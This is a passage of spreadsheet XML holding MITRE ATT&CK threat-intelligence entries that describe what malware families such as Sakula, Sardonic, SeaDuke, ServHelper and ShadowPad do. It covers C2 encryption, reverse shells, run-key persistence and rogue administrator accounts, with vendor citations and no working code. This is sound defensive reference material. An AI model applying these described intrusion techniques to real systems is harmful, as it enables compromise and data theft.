    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has been distributed through malicious links contained within spearphishing emails.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--63135ac5-fa86-41a0-9023-df4c8f830582</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has used Base64 to encode its C2 communications.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>relationship--ee6e6954-706f-4b19-9081-f9603c3f9e3e</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</si>
  <si>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</si>
  <si>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relationship--80933d22-6aa2-466d-95c2-af486b81c624</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) can identify the OS version, CPU, and other details from a victim's machine.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>relationship--4eb0635f-1851-4516-a584-4d5ff3c2e078</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</si>
  <si>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</si>
  <si>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relationship--a49fc7fd-5af0-4a2f-a2bb-f1d153e6b66d</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) can collect the IP address of a victim machine.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>relationship--20b9b6a1-e00a-4e79-99eb-dae27d85344a</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) can collect the username from a compromised host.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>relationship--e0566454-eca2-4623-9366-87827c0d3f1b</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has used the command `timeout 20` to pause the execution of its initial loader.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--56f3245a-b7dc-46a5-8454-7476e03fe772</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has used `.vbs` scripts for execution.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--7e000a72-a127-4cb4-be17-9541593462f6</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has used HTTP for C2 communications.(Citation: Malwarebytes Saint Bot April 2021)</t>
  </si>
  <si>
    <t>relationship--3c635743-c674-4ba5-a969-ab59656774eb</t>
  </si>
  <si>
    <t>[Saint Bot](https://attack.mitre.org/software/S1018) has used `cmd.exe` and `.bat` scripts for execution.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--524d34f7-ce44-4955-9ff0-fdd3035262b0</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) contains UAC bypass code for both 32- and 64-bit systems.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>relationship--3efe41c1-48be-48fc-90d8-5ae70df3cd97</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) uses DLL side-loading, typically using a digitally signed sample of Kaspersky Anti-Virus (AV) 6.0 for Windows Workstations or McAfee's Outlook Scan About Box to load malicious DLL files.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>relationship--5c34be50-c7be-40c2-80bb-f3bc7db5cdd7</t>
  </si>
  <si>
    <t>Some [Sakula](https://attack.mitre.org/software/S0074) samples use cmd.exe to delete temporary files.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>relationship--e2e91dcc-87b0-4ff8-a6cd-0dfd6a813483</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) has the capability to download files.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>relationship--33162cc2-a800-4d42-89bb-13ac1e75dfce</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) uses single-byte XOR obfuscation to obfuscate many of its files.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>relationship--266a5edd-1425-4ab1-88bf-a0d7897699eb</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</si>
  <si>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</si>
  <si>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relationship--384c75e4-04e7-4ff8-9da6-0c8a03cb7a61</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) calls cmd.exe to run various DLL files via rundll32.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>relationship--a79ff150-e765-4303-9668-ff553d6000cd</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) encodes C2 traffic with single-byte XOR keys.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>relationship--4e5dff55-c686-4fa6-bad1-caa8507083d9</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) uses HTTP for C2.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>relationship--3b9e7ec8-8b10-4fe4-87b3-38b7710dbbb9</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) calls cmd.exe to run various DLL files via rundll32 and also to perform file cleanup. [Sakula](https://attack.mitre.org/software/S0074) also has the capability to invoke a reverse shell.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>relationship--a3fe1f58-b507-42ea-a21e-a6ac46de9ca8</t>
  </si>
  <si>
    <t>Some [Sakula](https://attack.mitre.org/software/S0074) samples install themselves as services for persistence by calling WinExec with the &lt;code&gt;net start&lt;/code&gt; argument.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>relationship--d64ba78c-a332-40be-8e2f-904f15ceffe7</t>
  </si>
  <si>
    <t>S0370</t>
  </si>
  <si>
    <t>SamSam</t>
  </si>
  <si>
    <t>malware--4d56e6e9-1a6d-46e3-896c-dfdf3cc96e62</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) has used garbage code to pad some of its malware components.(Citation: Sophos SamSam Apr 2018)</t>
  </si>
  <si>
    <t>relationship--4c44fea9-545c-4d2f-a5e9-caee38ee65b4</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) encrypts victim files using RSA-2048 encryption and demands a ransom be paid in Bitcoin to decrypt those files.(Citation: Sophos SamSam Apr 2018)</t>
  </si>
  <si>
    <t>relationship--ac263a26-1773-4ac1-b81b-b29f9ace484a</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) has been seen deleting its own files and payloads to make analysis of the attack more difficult.(Citation: Sophos SamSam Apr 2018)</t>
  </si>
  <si>
    <t>relationship--063bf46c-0210-4e2f-bd7e-6db0f0975f07</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) has been seen using AES or DES to encrypt payloads and payload components.(Citation: Sophos SamSam Apr 2018)(Citation: Talos SamSam Jan 2018)</t>
  </si>
  <si>
    <t>relationship--28e637e9-480a-443b-82d7-13b7e2968733</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) uses custom batch scripts to execute some of its components.(Citation: Sophos SamSam Apr 2018)</t>
  </si>
  <si>
    <t>relationship--341025e9-e0b8-4e9b-873c-40d7bc86e131</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) has the ability to send a random 64-byte RC4 key to communicate with actor-controlled C2 servers by using an RSA public key.(Citation: Bitdefender Sardonic Aug 2021)</t>
  </si>
  <si>
    <t>relationship--d7eb1606-b003-41ce-81b3-a1c4d5d5e4d7</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) can use the `QueueUserAPC` API to execute shellcode on a compromised machine.(Citation: Symantec FIN8 Jul 2023)</t>
  </si>
  <si>
    <t>relationship--f80615a0-f092-44f5-91be-8b287428d3e3</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) PowerShell scripts can be encrypted with RC4 and compressed using Gzip.(Citation: Bitdefender Sardonic Aug 2021)</t>
  </si>
  <si>
    <t>relationship--051d3269-bc25-4844-aa83-d1acb5927a90</t>
  </si>
  <si>
    <t xml:space="preserve">[Sardonic](https://attack.mitre.org/software/S1085) has the ability to collect data from a compromised machine to deliver to the attacker.(Citation: Symantec FIN8 Jul 2023) </t>
  </si>
  <si>
    <t>relationship--59433b3a-625d-4a06-a6fa-1bebeda60975</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) can first decrypt with the RC4 algorithm using a hardcoded decryption key before decompressing.(Citation: Symantec FIN8 Jul 2023)</t>
  </si>
  <si>
    <t>relationship--582215ef-b7dd-43c3-a4ca-3a4a14edde59</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) has the ability to delete created WMI objects to evade detections.(Citation: Bitdefender Sardonic Aug 2021)</t>
  </si>
  <si>
    <t>relationship--bb5486b6-f5b3-4a4c-9b88-d676011a4906</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) has the ability to upload additional malicious files to a compromised machine.(Citation: Bitdefender Sardonic Aug 2021)</t>
  </si>
  <si>
    <t>relationship--49f54bdd-564c-43b0-95d7-5300f20d994f</t>
  </si>
  <si>
    <t xml:space="preserve">[Sardonic](https://attack.mitre.org/software/S1085) has the ability to call Win32 API functions to determine if `powershell.exe` is running.(Citation: Bitdefender Sardonic Aug 2021) </t>
  </si>
  <si>
    <t>relationship--af0f063e-811e-40fd-8ea4-135bf10f95b7</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) has the ability to execute the `net view` command.(Citation: Bitdefender Sardonic Aug 2021)</t>
  </si>
  <si>
    <t>relationship--55ec954d-e553-4055-bc56-56b9dd0c433f</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) can communicate with actor-controlled C2 servers by using a custom little-endian binary protocol.(Citation: Bitdefender Sardonic Aug 2021)</t>
  </si>
  <si>
    <t>relationship--ffcb5325-43d1-4b54-a9a5-f785c628136e</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) has the ability to connect with actor-controlled C2 servers using a custom binary protocol over port 443.(Citation: Bitdefender Sardonic Aug 2021)</t>
  </si>
  <si>
    <t>relationship--9ee6eb40-881c-4928-a036-58a8df0e8f95</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) can use certain ConfuserEx features for obfuscation and can be encoded in a base64 string.(Citation: Symantec FIN8 Jul 2023)</t>
  </si>
  <si>
    <t>relationship--d93b7c7b-e4b2-416c-9122-6f687642ce6e</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) has the ability to execute PowerShell commands on a compromised machine.(Citation: Bitdefender Sardonic Aug 2021)</t>
  </si>
  <si>
    <t>relationship--efb8b96b-7f50-4152-b18c-bbec7de28cbb</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) has the ability to execute the `tasklist` command.(Citation: Bitdefender Sardonic Aug 2021)</t>
  </si>
  <si>
    <t>relationship--a570d430-29ea-4c89-b25d-1370b44b0e5a</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) has a plugin system that can load specially made DLLs into memory and execute their functions.(Citation: Bitdefender Sardonic Aug 2021)(Citation: Symantec FIN8 Jul 2023)</t>
  </si>
  <si>
    <t>relationship--cd85bffe-6371-4fd9-b327-469647ebb420</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) can encode client ID data in 32 uppercase hex characters and transfer to the actor-controlled C2 server.(Citation: Bitdefender Sardonic Aug 2021)</t>
  </si>
  <si>
    <t>relationship--b108443a-669a-42a3-b065-3c97ba318fcf</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) has the ability to use an RC4 key to encrypt communications to and from actor-controlled C2 servers.(Citation: Bitdefender Sardonic Aug 2021)</t>
  </si>
  <si>
    <t>relationship--1de3d895-7bf9-4b60-b819-d49b31a26b38</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</si>
  <si>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</si>
  <si>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relationship--12ecc5cc-dad6-4532-9945-df575b008c2a</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) has the ability to execute the `ipconfig` command.(Citation: Bitdefender Sardonic Aug 2021)</t>
  </si>
  <si>
    <t>relationship--18da48c9-a1aa-4d13-b1b1-bd1a78e07c61</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) has the ability to execute the `netstat` command.(Citation: Bitdefender Sardonic Aug 2021)</t>
  </si>
  <si>
    <t>relationship--f22958eb-be19-4ae3-9899-2d77bd9a4acf</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) has the ability to execute the `net start` command.(Citation: Bitdefender Sardonic Aug 2021)</t>
  </si>
  <si>
    <t>relationship--a86529ff-e584-4566-afb9-6ffc366fd154</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) has the ability to run `cmd.exe` or other interactive processes on a compromised computer.(Citation: Symantec FIN8 Jul 2023)</t>
  </si>
  <si>
    <t>relationship--851a2e07-1494-46c7-bbca-d80f48f3279d</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) can use WMI to execute PowerShell commands on a compromised machine.(Citation: Bitdefender Sardonic Aug 2021)</t>
  </si>
  <si>
    <t>relationship--01000868-19de-44dd-bea5-ad30dae460ad</t>
  </si>
  <si>
    <t>[Sardonic](https://attack.mitre.org/software/S1085) can use a WMI event filter to invoke a command-line event consumer to gain persistence.(Citation: Bitdefender Sardonic Aug 2021)</t>
  </si>
  <si>
    <t>relationship--32b50ea5-7e1e-4253-b2b8-ba99a054c6d9</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) compressed data with zlib prior to sending it over C2.(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>relationship--45522d60-160a-4c07-bd98-9a487175910e</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) can securely delete files, including deleting itself from the victim.(Citation: Symantec Seaduke 2015)</t>
  </si>
  <si>
    <t>relationship--6f8cef32-d057-40f8-be52-62d86b1049e6</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) is capable of uploading and downloading files.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>relationship--5abaaa8f-19c7-448f-9e5a-66f1cbf412f9</t>
  </si>
  <si>
    <t>Some [SeaDuke](https://attack.mitre.org/software/S0053) samples have a module to use pass the ticket with Kerberos for authentication.(Citation: Symantec Seaduke 2015)</t>
  </si>
  <si>
    <t>relationship--02a7ea5c-695c-4932-9160-6e0441789670</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) uses a module to execute Mimikatz with PowerShell to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003).(Citation: Symantec Seaduke 2015)</t>
  </si>
  <si>
    <t>relationship--e7a0b7a4-b49b-46b9-9bfa-5db0a87dd09e</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) is capable of persisting via the Registry Run key or a .lnk file stored in the Startup directory.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>relationship--bcdbb8dc-87e5-4f29-8ff2-d660e53015cb</t>
  </si>
  <si>
    <t>Some [SeaDuke](https://attack.mitre.org/software/S0053) samples have a module to extract email from Microsoft Exchange servers using compromised credentials.(Citation: Symantec Seaduke 2015)</t>
  </si>
  <si>
    <t>relationship--76333b56-47b1-40c6-9223-c4cf6673362f</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) is capable of persisting via a .lnk file stored in the Startup directory.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>relationship--cfc64939-1c2c-4bc0-bfac-3492667b1bcd</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) has been packed with the UPX packer.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>relationship--8a48e56d-f837-4a5a-99b6-db0f60b541a0</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) C2 traffic is base64-encoded.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>relationship--13c97dd2-5c0b-4f18-84ab-533949fbeb25</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) C2 traffic has been encrypted with RC4 and AES.(Citation: Mandiant No Easy Breach)(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>relationship--c8d0e862-20af-4f9f-84e8-0419c8080008</t>
  </si>
  <si>
    <t>relationship--32864e94-8581-4f77-bf7d-53aaf3710f60</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) uses HTTP and HTTPS for C2.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--9ef645ab-afd1-41d6-ad60-d207fd134748</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) is capable of executing commands.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>relationship--0191f3d3-59d3-4fcc-bfff-5fbfa0675cfd</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) uses an event filter in WMI code to execute a previously dropped executable shortly after system startup.(Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>relationship--f653eb7d-7027-4161-9071-b52336bd4fbc</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) has a command to delete a specified file.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--acdc53fa-91d6-4417-bc7b-83c220ec9fae</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) has the capability to identify the drive type on a victim.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>relationship--2d76d7b2-ec41-4630-8405-ec7db2c0607c</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) has a command to download additional files.(Citation: Mandiant APT1 Appendix)(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--75f47e28-75dd-4471-8d00-ed4a2c4d3328</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) has masqueraded as a service called "SaSaut" with a display name of "System Authorization Service" in an apparent attempt to masquerade as a legitimate service.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--597555f7-33e3-4699-9acf-9c7f15a850c9</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) obfuscates configuration data.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--82168e77-bbd9-4da4-b163-7f813df06426</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) has a command to perform a process listing.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--4d36c850-0cd8-4e2a-9999-19f61eb37922</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) creates a Registry entry to ensure infection after reboot under &lt;code&gt;HKLM\Software\Microsoft\Windows\currentVersion\Run&lt;/code&gt;.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>relationship--b228cc3b-a428-42e4-b6f3-994fe790e329</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) uses HTTP for C2 communications.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--38a3eb0c-6313-4e1d-8321-7568435a8c23</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) uses cmd.exe to create a reverse shell on the infected endpoint.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--1719d211-582f-4ae9-90f4-2ec984360927</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) is capable of installing itself as a service.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--a81c971e-732c-4e76-99ad-c7108642dd47</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) has added a user named "supportaccount" to the Remote Desktop Users and Administrators groups.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>relationship--e5a4c386-e9c0-4b59-b1da-1acfece17977</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) may set up a reverse SSH tunnel to give the attacker access to services running on the victim, such as RDP.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>relationship--35bfe5a4-84ca-4601-82d8-073b1e384115</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) has a module to delete itself from the infected machine.(Citation: Proofpoint TA505 Jan 2019)(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>relationship--b70e627e-bd57-4e07-8e59-cb240034490a</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) may download additional files to execute.(Citation: Proofpoint TA505 Jan 2019)(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>relationship--435f910b-21a6-4814-b167-5262ca1e1e58</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) has created a new user named "supportaccount".(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>relationship--5db107fe-7b8d-4093-a551-492eb4a72ed9</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) has the ability to execute a PowerShell script to get information from the infected host.(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
    <t>relationship--8982affe-fe2b-40c8-8b0c-e539687f4124</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) may attempt to establish persistence via the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt; run key.(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>relationship--62bf46b4-69b3-4a32-bcbb-c9d960e3039a</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) has commands for adding a remote desktop user and sending RDP traffic to the attacker through a reverse SSH tunnel.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>relationship--608c5d3c-ba27-430d-8655-0ff7830fb5c5</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) contains a module for downloading and executing DLLs that leverages &lt;code&gt;rundll32.exe&lt;/code&gt;.(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>relationship--ac43f0bd-db6c-4000-8efe-7f33520780d9</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) contains modules that will use [schtasks](https://attack.mitre.org/software/S0111) to carry out malicious operations.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>relationship--d535f0e8-dc89-448c-828d-7464767a51a3</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) will attempt to enumerate Windows version and system architecture.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>relationship--5faa7f83-062b-4821-ad9b-b731a41c06d9</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) will attempt to enumerate the username of the victim.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>relationship--ab51438e-c79f-4fc5-b331-a85dc892b604</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) uses HTTP for C2.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>relationship--3fc0ea3d-0c51-4c2f-876d-912d08af32c2</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) can execute shell commands against [cmd](https://attack.mitre.org/software/S0106).(Citation: Proofpoint TA505 Jan 2019)(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>relationship--1db2b844-8ace-46f3-a2f9-527e813f32b6</t>
  </si>
  <si>
    <t>S0639</t>
  </si>
  <si>
    <t>Seth-Locker</t>
  </si>
  <si>
    <t>malware--f931a0b9-0361-4b1b-bacf-955062c35746</t>
  </si>
  <si>
    <t>[Seth-Locker](https://attack.mitre.org/software/S0639) can encrypt files on a targeted system, appending them with the suffix .seth.(Citation: Trend Micro Ransomware February 2021)</t>
  </si>
  <si>
    <t>relationship--d4221b38-c9cf-4773-9a49-afa7b07b917a</t>
  </si>
  <si>
    <t>[Seth-Locker](https://attack.mitre.org/software/S0639) has the ability to download and execute files on a compromised host.(Citation: Trend Micro Ransomware February 2021)</t>
  </si>
  <si>
    <t>relationship--1715a3b2-1c13-403e-8add-e8709fc7f92c</t>
  </si>
  <si>
    <t>[Seth-Locker](https://attack.mitre.org/software/S0639) can execute commands via the command line shell.(Citation: Trend Micro Ransomware February 2021)</t>
  </si>
  <si>
    <t>relationship--10801683-4565-4af5-a447-ac31043f8ad7</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has used DNS tunneling for C2 communications.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>relationship--936ff38b-73f6-48fe-876f-8ebd3b60df1f</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has decrypted a binary blob to start execution.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>relationship--26a6be0e-6d53-4f54-b190-af359bfab4fc</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) uses a DGA that is based on the day of the month for C2 servers.(Citation: Securelist ShadowPad Aug 2017)(Citation: Kaspersky ShadowPad Aug 2017)(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>relationship--e9d51358-7606-4598-8185-8ad978e87d71</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has injected a DLL into svchost.exe.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>relationship--fa7b6b1c-de8b-4e6b-ae62-785bc6ce3c51</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has used FTP for C2 communications.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>relationship--a43b5d19-a2d5-4440-b0c6-6d4819edb77e</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) maintains a configuration block and virtual file system in the Registry.(Citation: Kaspersky ShadowPad Aug 2017)(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--4459b6fe-e1d0-40cb-b6f1-efc0e4431442</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has deleted arbitrary Registry values.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>relationship--0dff1232-e275-46bd-b893-3df8b5a6b0c2</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has downloaded code from a C2 server.(Citation: Securelist ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>relationship--f72ffc5a-c872-4b28-b40e-2a3ec85bddcc</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) can modify the Registry to store and maintain a configuration block and virtual file system.(Citation: Kaspersky ShadowPad Aug 2017)(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--072c3b1d-1ad6-447e-9512-2c6bc6e797fd</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has used UDP for C2 communications.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>relationship--a726ffe8-d192-4f40-be21-ba2ffe32c670</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has encoded data as readable Latin characters.(Citation: Securelist ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>relationship--951c72ac-3839-4716-a052-ffa79f5b62fe</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has encrypted its payload, a virtual file system, and various files.(Citation: Securelist ShadowPad Aug 2017)(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--c0876037-56b6-409c-bda5-7aa5e6091c94</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has collected the PID of a malicious process.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>relationship--931a5425-011a-42b5-ae49-fba9c70572b6</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has injected an install module into a newly created process.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>relationship--cb02fb3b-8223-476f-90be-ab50e3432d0a</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has sent data back to C2 every 8 hours.(Citation: Securelist ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>relationship--8a62bb3c-2019-4747-a5e8-137c788fca77</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has discovered system information including memory status, CPU frequency, OS versions, and volume serial numbers.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>relationship--d216c395-ceb2-4103-8035-336a0821b79c</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has collected the domain name of the victim system.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>relationship--878a1144-2523-47fb-b1c9-ce082f7bc03e</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has collected the username of the victim system.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
